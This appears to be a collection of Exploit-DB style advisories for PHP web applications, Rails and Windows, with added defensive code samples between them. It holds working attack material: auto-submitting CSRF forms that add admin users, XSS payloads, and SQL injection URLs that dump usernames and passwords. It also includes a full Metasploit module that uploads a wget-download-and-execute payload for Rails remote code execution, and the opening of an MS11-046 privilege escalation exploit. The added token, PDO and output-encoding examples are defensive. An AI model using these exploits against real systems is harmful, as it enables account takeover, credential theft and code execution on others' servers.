"Content-Disposition: form-data; name=\"email\"\r\n" +
"\r\n" +
"ahsan@ahsan.py\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"_password\"\r\n" +
"\r\n" +
"ahsan123\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"_password2\"\r\n" +
"\r\n" +
"ahsan123\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"usergroup_id\"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"v[avatar[]]\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"avatar[]\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"website\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"phone\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"biography\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"facebook\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"twitter\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"gplus\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"linkedin\"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"sponsored\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"featured\"\r\n" +
"\r\n" +
"0\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"featured_end\"\r\n" +
"\r\n" +
"2016-11-15 04:54\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"status\"\r\n" +
"\r\n" +
"active\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"save\"\r\n" +
"\r\n" +
"Add\r\n" +
"-----------------------------2573679013209\r\n" +
"Content-Disposition: form-data; name=\"goto\"\r\n" +
"\r\n" +
"list\r\n" +
"-----------------------------2573679013209--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
Credits & Authors:
==================
Ahsan Tahir - [https://twitter.com/AhsanTahirAT]
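Anti-CSRF token validation, added here as an example for the Subrion '__st' bypass above and for the PHP NEWS advisory further down, which has no token at all (this is not code from either project). It assumes, from the advisory's description, that the bypassed check accepted any value of the token's length; that weak check is shown beside one that binds the token to the session and compares it in constant time.

```python
"""Anti-CSRF token validation, added example (not Subrion's or PHP NEWS's code).

The Subrion bypass above works when any value with the token's length is
accepted; PHP NEWS has no token at all. Below, a simulated admin/blog/add
handler is driven once with a length-only check (assumed to model the bypassed
behaviour) and once with a check that binds the token to the session and
compares it in constant time.
"""
import hmac
import secrets

TOKEN_FIELD = "__st"   # parameter name from the Subrion advisory


def issue_token(session):
    """Mint a per-session token; the server keeps it, the form carries a copy."""
    session[TOKEN_FIELD] = secrets.token_hex(16)
    return session[TOKEN_FIELD]


def length_only_check(session, submitted):
    """Weak (assumed model of the bypassed check): any string of the right
    length passes, so a forged form filled with XXXX... is accepted."""
    return len(submitted) == len(session.get(TOKEN_FIELD, ""))


def session_bound_check(session, submitted):
    """Correct: a token must exist for this session and match byte for byte;
    hmac.compare_digest avoids leaking the match position through timing."""
    expected = session.get(TOKEN_FIELD)
    if not expected or not isinstance(submitted, str):
        return False
    return hmac.compare_digest(expected.encode(), submitted.encode())


def handle_add_post(session, form, check):
    """Simulated POST handler: create the post only when `check` passes."""
    if not check(session, form.get(TOKEN_FIELD, "")):
        return {"status": 403, "created": None}
    return {"status": 200,
            "created": {"title": form.get("title", ""), "tags": form.get("tags", "")}}


def demo():
    """Drive both checks with a legitimate form and a forged one (constructed)."""
    session = {}
    token = issue_token(session)
    legit = {TOKEN_FIELD: token, "title": "Release notes", "tags": "news"}
    forged = {TOKEN_FIELD: "X" * len(token),   # right length, wrong value
              "title": "forged post", "tags": "forged"}
    return {
        "weak_legit": handle_add_post(session, legit, length_only_check)["status"],
        "weak_forged": handle_add_post(session, forged, length_only_check)["status"],
        "strong_legit": handle_add_post(session, legit, session_bound_check)["status"],
        "strong_forged": handle_add_post(session, forged, session_bound_check)["status"],
        # PHP NEWS case: the form carries no token and none was issued
        "no_token": handle_add_post({}, {"title": "x"}, session_bound_check)["status"],
    }


if __name__ == "__main__":
    for case, status in demo().items():
        print(f"{case:13s} -> HTTP {status}")
```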
# Exploit Title: PHP Image Database - Multiple Vulnerabilities
# Date: 2016-10-16
# Exploit Author: larrycompress
# Contact: larrycompress@gmail.com
# Type: webapps
# Platform: PHP
# Vendor Homepage: http://www.pagereactions.com/product.php?pku=3
# Software Link: http://www.pagereactions.com/downloads/phpimagedatabase.zip
----------------------------------------------------------------------------
POC as follows :
# 0x00 Reflected XSS
---
1.In public search :
http://192.168.1.112/phpimagedatabase/index.php?dateyear=<svg/onload=alert(1)>&key=<svg/onload=alert(2)>
2.In administration web interface (need normal user login) :
http://192.168.1.112/phpimagedatabase/administration.php?dateyear=<svg/onload=alert(1)>&key=<svg/onload=alert(2)>
# 0x01 Stored XSS
---
1.In administration web images interface (need normal user login) :
http://192.168.1.112/phpimagedatabase/administration.php
?pageaction=newimage
&MAX_FILE_SIZE=1000000
&subaction=submit
&dateday=16
&datemonthnewedit=10
&dateyearnewedit=2016
&title=<svg/onload=alert(1)>
&caption=<svg/onload=alert(2)>
&keywordtags=<svg/onload=alert(3)>
&photographer=<svg/onload=alert(4)>
&categorynewedit=
&publish=active
2.In administration web categories interface (need administrator user login) :
http://192.168.1.112/phpimagedatabase/administration.php?pageaction=newcategory&subaction=submit&categoryname=</select><svg/onload=alert(1)><select>
# 0x02 CSRF (add Super user)
---
In http://192.168.1.103/csrf.html :
<!DOCTYPE html>
<html>
<body>
<form action="http://192.168.1.112/phpimagedatabase/administration.php" method="POST">
<input name="pageaction" value="saveuser" type="hidden" />
<input name="subaction" value="submit" type="hidden" />
<input name="username" value="larry_csrf" type="hidden" />
<input name="password" value="larry_csrf" type="hidden" />
<input name="userfullname" value="larry_csrf" type="hidden" />
<input name="accesslevel" value="Super" type="hidden" />
<input name="userstatus" value="active" type="hidden" />
<input name="mysubmit" value="submit" type="submit" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
* Thanks to Besim *
*=========================================================================================================
# Exploit Title: PHP NEWS 1.3.0 - Cross-Site Request Forgery (Add Admin)
# Author: Meryem AKDOĞAN
# Google Dork: -
# Date: 16/10/2016
# Type: webapps
# Platform : PHP
# Vendor Homepage: http://newsphp.sourceforge.net
# Software Link: https://sourceforge.net/projects/newsphp/
# Version: 1.3.0
*=========================================================================================================
DETAILS
========================================
PHP NEWS 1.3.0 is vulnerable to a CSRF attack (no CSRF token is in place):
if an admin user can be tricked into visiting a crafted URL created by the
attacker (via spear phishing or social engineering), a form will be
submitted to http://sitename/path/index.php that changes the admin
password.
Once exploited, the attacker can log in to the admin panel using the
username and password posted in the form.
RISK
========================================
An attacker can change the admin password with this vulnerability.
TECHNICAL DETAILS & POC
========================================
<html>
<!-- CSRF PoC -->
<body>
<form action="http://site_name/phpnews/index.php?action=modifynewsposter3" method="POST">
<input type="hidden" name="id" value="7" />
<input type="hidden" name="newusername" value="meryem akdogan" />
<input type="hidden" name="username" value="meryem" />
<input type="hidden" name="password" value="meryem123." />
<input type="hidden" name="password2" value="meryem123." />
<input type="hidden" name="email" value="b@gmail.com" />
<input type="hidden" name="language" value="en_GB" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
========================================
# Exploit Title.............. Simple Shopping Cart Application SQL Injection
# Google Dork................ inurl:"product-details.php?prodid=" "Designed by FBC Students"
# Date....................... 14/10/2016
# Exploit Author............. lahilote
# Vendor Homepage............ http://www.sourcecodester.com/php/10181/simple-shopping-cart-application-php-mysql.html
# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/tyron69/ecommerce_0.zip
# Version.................... 0.1
# Tested on.................. xampp
# CVE........................ N/A
The audit_list in shop/product-details.php
-------------------------------
----snip----
$prodID = $_GET['prodid'];
if(!empty($prodID)){
$sqlSelectSpecProd = mysql_query("select * from products where id = '$prodID'") or die(mysql_error());
$getProdInfo = mysql_fetch_array($sqlSelectSpecProd);
$prodname= $getProdInfo["Product"];
----snip----
Example exploitation
--------------------
http://server/shop/product-details.php?prodid=-80%27%20union%20select%201,2,concat(username,0x3a,password),4,version(),user()%20from%20user--+
How to fix
----------
A simple method is to use the PHP function intval.
For example
$prodID = intval($_GET['prodid']);
if(!empty($prodID)){
$sqlSelectSpecProd = mysql_query("select * from products where id = '$prodID'") or die(mysql_error());
$getProdInfo = mysql_fetch_array($sqlSelectSpecProd);
$prodname= $getProdInfo["Product"];
Credits
-------
This vulnerability was discovered and researched by lahilote
References
----------
http://www.sourcecodester.com/php/10181/simple-shopping-cart-application-php-mysql.html
http://php.net/manual/en/function.intval.php
# Exploit Title.............. School Full CBT SQL Injection
# Google Dork................ N/A
# Date....................... 14/10/2016
# Exploit Author............. lahilote
# Vendor Homepage............ http://www.sourcecodester.com/node/9859
# Software Link.............. http://www.sourcecodester.com/sites/default/files/download/fimo4real1992/cbt_by_ajijola_femi.zip
# Version.................... 0.1
# Tested on.................. xampp
# CVE........................ N/A
The audit_list in /show.php
-------------------------------
----snip----
$get = $_GET['show'];
$result= mysql_query("select * from studentreg WHERE id=$get")or die(mysql_error());
----snip----
Example exploitation
--------------------
http://server/path_to_webapp/show.php?show=-1%20union%20select%201,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,user(),database(),31,32%20from%20adminlogin--+
How to fix
----------
A simple method is to use the PHP function intval.
For example
$get = intval($_GET['show']);
$result= mysql_query("select * from studentreg WHERE id=$get")or die(mysql_error());
Credits
-------
This vulnerability was discovered and researched by lahilote
References
----------
http://www.sourcecodester.com/node/9859
http://php.net/manual/en/function.intval.php
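Both "How to fix" sections above (Simple Shopping Cart and School Full CBT) recommend intval(). As an added example, not the vendors' code, here is the product lookup rewritten with PDO: the id is validated as a positive integer and then bound as a parameter, so the value is never concatenated into the SQL text. It uses an in-memory SQLite database with a constructed schema and rows so that it runs stand-alone; against MySQL only the DSN changes. The products table and Product column follow the snippet above; the user table with username and password columns is constructed here only so that the advisory's payload can be shown being rejected.

```php
<?php
// Added example, not code from Simple Shopping Cart or School Full CBT:
// the product lookup with input validation and a bound parameter.
declare(strict_types=1);

// Constructed in-memory database standing in for the application's MySQL schema.
function openDemoDb(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE products (id INTEGER PRIMARY KEY, Product TEXT, Price REAL)');
    $db->exec("INSERT INTO products (id, Product, Price) VALUES (80, 'Widget', 9.99), (81, 'Gadget', 19.99)");
    $db->exec('CREATE TABLE user (id INTEGER PRIMARY KEY, username TEXT, password TEXT)');
    $db->exec("INSERT INTO user (id, username, password) VALUES (1, 'admin', 'hash-placeholder')");
    return $db;
}

// Validate first: only a positive integer is an acceptable product id.
// FILTER_VALIDATE_INT returns false for anything with quotes or SQL in it,
// whereas intval("-80' union ...") would silently yield -80.
function parseProductId(string $raw): ?int
{
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

// Query with a bound parameter. The statement text is fixed; the id travels
// separately as an integer, so no input can alter the query structure.
function fetchProduct(PDO $db, string $rawId): ?array
{
    $id = parseProductId($rawId);
    if ($id === null) {
        return null;
    }
    $stmt = $db->prepare('SELECT id, Product, Price FROM products WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

$db = openDemoDb();

// A legitimate request.
var_dump(fetchProduct($db, '80'));

// The advisory's payload (URL-decoded): validation rejects it before any SQL runs.
$payload = "-80' union select 1,2,concat(username,0x3a,password),4,version(),user() from user-- ";
var_dump(fetchProduct($db, $payload));
```

The legacy mysql_* extension the snippets use has no parameter binding and was removed in PHP 7; PDO (or mysqli with prepared statements) is the replacement. Validation and binding are both kept: the integer check rejects malformed ids early with a clean error, and the bound parameter protects the query even if a future change passes a string column through the same path.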
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'Ruby on Rails Dynamic Render File Upload Remote Code Execution',
'Description' => %q{
This module exploits a remote code execution vulnerability in the explicit render
method when leveraging user parameters.
This module has been tested across multiple versions of Ruby on Rails.
The technique used by this module requires the specified
endpoint to be using dynamic render paths, such as the following example:
def show
render params[:id]
end
Also, the vulnerable target will need a POST endpoint for the TempFile upload, this
can literally be any endpoint. This module doesn't use the log inclusion method of
exploitation due to it not being universal enough. Instead, a new code injection
technique was found and used whereby an attacker can upload temporary image files
against any POST endpoint and use them for the inclusion attack. Finally, you only
get one shot at this if you are testing with the builtin rails server, use caution.
},
'Author' =>
[
'mr_me <mr_me@offensive-security.com>', # necromanced old bug & discovered new vector rce vector
'John Poulin (forced-request)' # original render bug finder
],
'References' =>
[
[ 'CVE', '2016-0752'],
[ 'URL', 'https://groups.google.com/forum/#!topic/rubyonrails-security/335P1DcLG00'], # rails patch
[ 'URL', 'https://nvisium.com/blog/2016/01/26/rails-dynamic-render-to-rce-cve-2016-0752/'], # John Poulin CVE-2016-0752 patched in 5.0.0.beta1.1 - January 25, 2016
[ 'URL', 'https://gist.github.com/forced-request/5158759a6418e6376afb'], # John's original exploit
],
'License' => MSF_LICENSE,
'Platform' => ['linux', 'bsd'],
'Arch' => ARCH_X86,
'Payload' =>
{
'DisableNops' => true,
},
'Privileged' => false,
'Targets' =>
[
[ 'Ruby on Rails 4.0.8 July 2, 2014', {} ] # Other versions are also affected
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Oct 16 2016'))
register_options(
[
Opt::RPORT(3000),
OptString.new('URIPATH', [ true, 'The path to the vulnerable route', "/users"]),
OptPort.new('SRVPORT', [ true, 'The daemon port to listen on', 1337 ]),
], self.class)
end
def check
# this is the check for the dev environment
res = send_request_cgi({
'uri' => normalize_uri(datastore['URIPATH'], "%2f"),
'method' => 'GET',
}, 60)
# if the page controller is dynamically rendering, it's for sure vuln
if res and res.body =~ /render params/
return CheckCode::Vulnerable
end
# this is the check for the prod environment
res = send_request_cgi({
'uri' => normalize_uri(datastore['URIPATH'], "%2fproc%2fself%2fcomm"),
'method' => 'GET',
}, 60)
# if we can read files, it's likely we can execute code
if res and res.body =~ /ruby/
return CheckCode::Appears
end
return CheckCode::Safe
end
def on_request_uri(cli, request)
if (not @pl)
print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
return
end
print_status("#{rhost}:#{rport} - Sending the payload to the server...")
@elf_sent = true
send_response(cli, @pl)
end
def send_payload
@bd = rand_text_alpha(8+rand(8))
fn = rand_text_alpha(8+rand(8))
un = rand_text_alpha(8+rand(8))
pn = rand_text_alpha(8+rand(8))
register_file_for_cleanup("/tmp/#{@bd}")
cmd = "wget #{@service_url} -O /tmp/#{@bd};"
cmd << "chmod 755 /tmp/#{@bd};"
cmd << "/tmp/#{@bd}"
pay = "<%=`#{cmd}`%>"
print_status("uploading image...")
data = Rex::MIME::Message.new
data.add_part(pay, nil, nil, 'form-data; name="#{un}"; filename="#{fn}.gif"')
res = send_request_cgi({
'method' => 'POST',
'cookie' => @cookie,
'uri' => normalize_uri(datastore['URIPATH'], pn),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s
})
if res and res.code == 422 and res.body =~ /Tempfile:\/(.*)>/
@path = "#{$1}" if res.body =~ /Tempfile:\/(.*)>/
return true
else
# this is where we pull the log file
if leak_log
return true
end
end
return false
end
def leak_log
# path to the log /proc/self/fd/7
# this bypasses the extension check
res = send_request_cgi({
'uri' => normalize_uri(datastore['URIPATH'], "proc%2fself%2ffd%2f7"),
'method' => 'GET',
}, 60)
if res and res.code == 200 and res.body =~ /Tempfile:\/(.*)>, @original_filename=/
@path = "#{$1}" if res.body =~ /Tempfile:\/(.*)>, @original_filename=/
return true
end
return false
end
def start_http_server
@pl = generate_payload_exe
@elf_sent = false
downfile = rand_text_alpha(8+rand(8))
resource_uri = '/' + downfile
if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
srv_host = datastore['URIHOST'] || Rex::Socket.source_address(rhost)
else
srv_host = datastore['SRVHOST']
end
# do not use SSL for the attacking web server
if datastore['SSL']
ssl_restore = true
datastore['SSL'] = false
end
@service_url = "http://#{srv_host}:#{datastore['SRVPORT']}#{resource_uri}"
service_url_payload = srv_host + resource_uri
print_status("#{rhost}:#{rport} - Starting up our web service on #{@service_url} ...")
start_service({'Uri' => {
'Proc' => Proc.new { |cli, req|
on_request_uri(cli, req)
},
'Path' => resource_uri
}})
datastore['SSL'] = true if ssl_restore
connect
end
def render_tmpfile
@path.gsub!(/\//, '%2f')
res = send_request_cgi({
'uri' => normalize_uri(datastore['URIPATH'], @path),
'method' => 'GET',
}, 1)
end
def exploit
print_status("Sending initial request to detect exploitability")
start_http_server
if send_payload
print_good("injected payload")
render_tmpfile
# we need to delay, for the stager
select(nil, nil, nil, 5)
end
end
end
# Exploit Title: PHP Business Directory - Multiple Vulnerabilities
# Date: 2016-10-16
# Exploit Author: larrycompress
# Contact: larrycompress@gmail.com
# Type: webapps
# Platform: PHP
# Vendor Homepage: http://www.pagereactions.com/product.php?pku=4
# Software Link: http://www.pagereactions.com/downloads/phpbusinessdirectory.zip
--------------------------------------------------------------------------------
PoC as follows:
# 0x00 Reflected XSS
---
1. In public search:
http://192.168.1.112/phpbusinessdirectory/index.php?key=<svg/onload=alert(1)>&location=<svg/onload=alert(2)>
2. In the administration web interface (requires a normal user login):
http://192.168.1.112/phpbusinessdirectory/administration.php?key=<svg/onload=alert(1)>&location=<svg/onload=alert(2)>
# 0x01 Stored XSS
---
1. In the administration web directory interface (requires a normal user login):
http://192.168.1.112/phpbusinessdirectory/administration.php
?pageaction=newsavebusiness
&subaction=submit
&businessname=<script>alert(1)</script>
&slogan=<script>alert(2)</script>
&businesslicence=<script>alert(3)</script>
&address=<script>alert(4)</script>
&city=<script>alert(5)</script>
&suburb=<script>alert(6)</script>
&businessstate=<script>alert(7)</script>
&country=<script>alert(8)</script>
&zippostcode=<script>alert(9)/*
&telephone1=*/</script><script>alert(10)</script>
&telephone2=<script>alert(11)</script>
&mobilecell=<script>alert(12)</script>
&fax=<script>alert(13)</script>
&email=<script>alert(14)</script>
&website=<script>alert(15)</script>
&socialmedia1=<script>alert(16)</script>
&socialmedia2=<script>alert(17)</script>
&socialmedia3=<script>alert(18)</script>
&productservice=<script>alert(19)</script>
&manager=<script>alert(20)</script>
&paymentsaccepted=<script>alert(21)</script>
2. In the administration web categories interface (requires an administrator login):
http://192.168.1.112/phpbusinessdirectory/administration.php?pageaction=savecategory&subaction=submit&categoryname=</select><svg/onload=alert(1)><select>
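The reflected and stored XSS items in both advisories (PHP Image Database above and PHP Business Directory here) share one root cause: user-supplied values are written back into HTML without encoding. As an added example, not the vendors' code, the snippet below shows output encoding at the sink for the two contexts the PoCs target, a form field echoing the search terms and the category select that the `</select>` payload breaks out of. The function names and the sample category list are constructed for the example.

```php
<?php
// Added example, not code from PHP Image Database or PHP Business Directory:
// context-aware HTML output encoding for the sinks the advisories exercise.
declare(strict_types=1);

// Encode for HTML text and attribute values. ENT_QUOTES also encodes the
// single quote, which matters when a value lands inside a quoted attribute;
// ENT_SUBSTITUTE replaces invalid UTF-8 instead of returning an empty string.
function e(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Search form that echoes the previous query back (the reflected XSS sink).
function renderSearchForm(string $key, string $location): string
{
    return '<form method="get">'
        . '<input name="key" value="' . e($key) . '">'
        . '<input name="location" value="' . e($location) . '">'
        . '</form>';
}

// Category dropdown built from stored names (the stored XSS sink). Because
// every name is encoded, a stored "</select>" stays literal text.
function renderCategorySelect(array $categories): string
{
    $html = '<select name="category">';
    foreach ($categories as $id => $name) {
        $html .= '<option value="' . e((string) $id) . '">' . e($name) . '</option>';
    }
    return $html . '</select>';
}

// Constructed inputs, taken from the PoC URLs in the advisories.
echo renderSearchForm('<svg/onload=alert(1)>', '<svg/onload=alert(2)>'), "\n";
echo renderCategorySelect([
    1 => 'Landscapes',
    2 => '</select><svg/onload=alert(1)><select>',
]), "\n";
```

Values are stored as the user entered them and encoded on every render; encoding on input instead would corrupt data that is later used in a non-HTML context (CSV export, JSON, e-mail). A Content-Security-Policy that disallows inline script is a worthwhile second layer, but it does not replace encoding at the sink.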
# 0x02 CSRF (add Super user)
---
In http://192.168.1.103/csrf.html :
<!DOCTYPE html>
<html>
<body>
<form action="http://192.168.1.112/phpbusinessdirectory/administration.php" method="POST">
<input name="pageaction" value="saveuser" type="hidden" />
<input name="subaction" value="submit" type="hidden" />
<input name="username" value="larry_csrf" type="hidden" />
<input name="password" value="larry_csrf" type="hidden" />
<input name="userfullname" value="larry_csrf" type="hidden" />
<input name="accesslevel" value="Super" type="hidden" />
<input name="userstatus" value="active" type="hidden" />
<input name="mysubmit" value="submit" type="submit" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
* Thanks to Besim *
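Three of the advisories above (PHP Image Database, PHP NEWS and PHP Business Directory) show the same pattern: a state-changing POST to the administration page that succeeds with nothing but the victim's session cookie, so an auto-submitting form on an attacker-controlled page can add a user or change the admin password. As an added example, not code from any of those applications, here is a synchronizer-token check for the saveuser handler. The session is passed in as an array so the functions can be exercised from the CLI; the handler name and the simulated requests are constructed for the example.

```php
<?php
// Added example, not code from PHP Image Database, PHP NEWS or PHP Business
// Directory: a synchronizer (per-session) CSRF token for state-changing forms.
declare(strict_types=1);

// Issue a token once per session and reuse it; 32 random bytes is ample.
function csrfToken(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Hidden field the legitimate form must include.
function csrfField(array &$session): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrfToken($session), ENT_QUOTES, 'UTF-8') . '">';
}

// Check a submitted form. hash_equals compares in constant time, so the
// comparison does not leak the token one byte at a time.
function csrfValid(array $session, array $post): bool
{
    if (empty($session['csrf_token']) || !isset($post['csrf_token']) || !is_string($post['csrf_token'])) {
        return false;
    }
    return hash_equals($session['csrf_token'], $post['csrf_token']);
}

// Handler for pageaction=saveuser that refuses to act without a valid token.
// A real handler would send a 403 here; the string return keeps the demo CLI-friendly.
function handleSaveUser(array &$session, array $post): string
{
    if (!csrfValid($session, $post)) {
        return 'rejected: missing or invalid CSRF token';
    }
    // ... create the user here ...
    return 'user ' . htmlspecialchars($post['username'] ?? '', ENT_QUOTES, 'UTF-8') . ' saved';
}

// Constructed simulation of two requests against the same session.
$session = [];
echo csrfField($session), "\n";

// The site's own form carries the token it was rendered with.
$legit = ['pageaction' => 'saveuser', 'username' => 'alice', 'csrf_token' => csrfToken($session)];
echo handleSaveUser($session, $legit), "\n";

// The auto-submitting form from the PoC pages carries no token, because the
// attacker's page cannot read the victim's session.
$crossSite = ['pageaction' => 'saveuser', 'username' => 'larry_csrf', 'accesslevel' => 'Super'];
echo handleSaveUser($session, $crossSite), "\n";
```

In the application this would wrap the existing administration.php handlers: render csrfField() into every form that changes state, and call csrfValid() before acting on any POST. Setting the session cookie with SameSite=Lax or Strict adds a browser-enforced second layer, but the token check is what makes the fix hold on browsers that ignore the attribute.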
/*
################################################################
# Exploit Title: Windows x86 (all versions) AFD privilege escalation (MS11-046)
# Date: 2016-10-16
# Exploit Author: Tomislav Paskalev
# Vulnerable Software:
# Windows XP SP3 x86
# Windows XP Pro SP2 x64
# Windows Server 2003 SP2 x86
# Windows Server 2003 SP2 x64
# Windows Server 2003 SP2 Itanium-based Systems
# Windows Vista SP1 x86
# Windows Vista SP2 x86
# Windows Vista SP1 x64
# Windows Vista SP2 x64
# Windows Server 2008 x86
# Windows Server 2008 SP2 x86
# Windows Server 2008 x64
# Windows Server 2008 SP2 x64
# Windows Server 2008 Itanium-based Systems
# Windows Server 2008 SP2 Itanium-based Systems
# Windows 7 x86
# Windows 7 SP1 x86
# Windows 7 x64
# Windows 7 SP1 x64
# Windows Server 2008 R2 x64
# Windows Server 2008 R2 SP1 x64
# Windows Server 2008 R2 Itanium-based Systems
# Windows Server 2008 R2 SP1 Itanium-based Systems
# Supported Vulnerable Software:
# Windows XP SP3 x86
# Windows Server 2003 SP2 x86
# Windows Vista SP1 x86
# Windows Vista SP2 x86
# Windows Server 2008 x86
# Windows Server 2008 SP2 x86
# Windows 7 x86
# Windows 7 SP1 x86
# Tested Software:
# Windows XP Pro SP3 x86 EN [5.1.2600]
# Windows Server 2003 Ent SP2 EN [5.2.3790]
# Windows Vista Ult SP1 x86 EN [6.0.6001]
# Windows Vista Ult SP2 x86 EN [6.0.6002]
# Windows Server 2008 Dat SP1 x86 EN [6.0.6001]
# Windows Server 2008 Ent SP2 x86 EN [6.0.6002]
# Windows 7 HB x86 EN [6.1.7600]
# Windows 7 Ent SP1 x86 EN [6.1.7601]
# CVE ID: 2011-1249
################################################################
# Vulnerability description:
# The Ancillary Function Driver (AFD) supports Windows sockets
# applications and is contained in the afd.sys file. The afd.sys
# driver runs in kernel mode and manages the Winsock TCP/IP
# communications protocol.
# An elevation of privilege vulnerability exists where the AFD
# improperly validates input passed from user mode to the kernel.
# An attacker must have valid logon credentials and be able to
# log on locally to exploit the vulnerability.
# An attacker who successfully exploited this vulnerability could
# run arbitrary code in kernel mode (i.e. with NT AUTHORITY\SYSTEM
# privileges).
################################################################
# Exploit notes:
# Privileged shell execution:
# - the SYSTEM shell will spawn within the invoking shell/process
# Exploit compiling (Kali GNU/Linux Rolling 64-bit):
# - # i686-w64-mingw32-gcc MS11-046.c -o MS11-046.exe -lws2_32
# Exploit prerequisites:
# - low privilege access to the target OS
# - target OS not patched (KB2503665, or any other related
# patch, if applicable, not installed - check "Related security
# vulnerabilities/patches")
# Exploit test notes:
# - let the target OS boot properly (if applicable)
# - Windows 7 (SP0 and SP1) will BSOD on shutdown/reset
################################################################
# Patches:
# Windows XP SP3 x86
# WindowsXP-KB2503665-x86-enu.exe
# (not available - EoL)
# Windows Server 2003 SP2 x86
# WindowsServer2003-KB2503665-x86-enu.exe
# https://www.microsoft.com/en-us/download/details.aspx?id=26483
# Windows Vista SP1, SP2 x86; Windows Server 2008 (SP1), SP2 x86
# Windows6.0-KB2503665-x86.msu
# https://www.microsoft.com/en-us/download/details.aspx?id=26275
# Windows 7 (SP0), SP1 x86
# Windows6.1-KB2503665-x86.msu
# https://www.microsoft.com/en-us/download/details.aspx?id=26311
################################################################
# Related security vulnerabilities/patches:
# MS11-046 KB2503665 https://technet.microsoft.com/en-us/library/security/ms11-046.aspx
# MS11-080 KB2592799 https://technet.microsoft.com/en-us/library/security/ms11-080.aspx
# MS12-009 KB2645640 https://technet.microsoft.com/en-us/library/security/ms12-009.aspx
# MS13-093 KB2875783 https://technet.microsoft.com/en-us/library/security/ms13-093.aspx
# MS14-040 KB2975684 https://technet.microsoft.com/en-us/library/security/ms14-040.aspx
#
# Table of patch replacements:
# | MS11-046 | MS11-080 | MS12-009 | MS13-093 | MS14-040 |
# -------------------------------------------------------------
# | KB2503665 | KB2592799 | KB2645640 | KB2875783 | KB2975684 |
# -----------------------------------------------------------------------------------------
# Windows x86 XP SP3 | Installed | <-Replaces| - | - | - |
# Windows x86 Server 2003 SP2 | Installed | <-Replaces| <-Replaces| - | <-Replaces|
# Windows x86 Vista SP1 | Installed | - | - | - | - |
# Windows x86 Vista SP2 | Installed | - | - | - | <-Replaces|
# Windows x86 Server 2008 | Installed | - | - | - | - |
# Windows x86 Server 2008 SP2 | Installed | - | - | - | <-Replaces|
# Windows x86 7 | Installed | - | - | - | - |
# Windows x86 7 SP1 | Installed | - | - | - | <-Replaces|
################################################################
# Thanks to:
# azy (XP, 2k3 exploit)
# Rahul Sasi (PoC)
################################################################
# References:
# https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-1249
# https://technet.microsoft.com/en-us/library/security/ms11-046.aspx
# http://web.qhwins.com/Security/2012021712023641874126.html
# https://www.exploit-db.com/exploits/18755/
################################################################
*/
#include <winsock2.h>
#include <windows.h>
#include <stdio.h>
#include <ws2tcpip.h>
#pragma comment (lib, "ws2_32.lib")
////////////////////////////////////////////////////////////////
// DEFINE DATA TYPES
////////////////////////////////////////////////////////////////
typedef enum _KPROFILE_SOURCE {
ProfileTime,
ProfileAlignmentFixup,
ProfileTotalIssues,
ProfilePipelineDry,
ProfileLoadInstructions,
ProfilePipelineFrozen,
ProfileBranchInstructions,
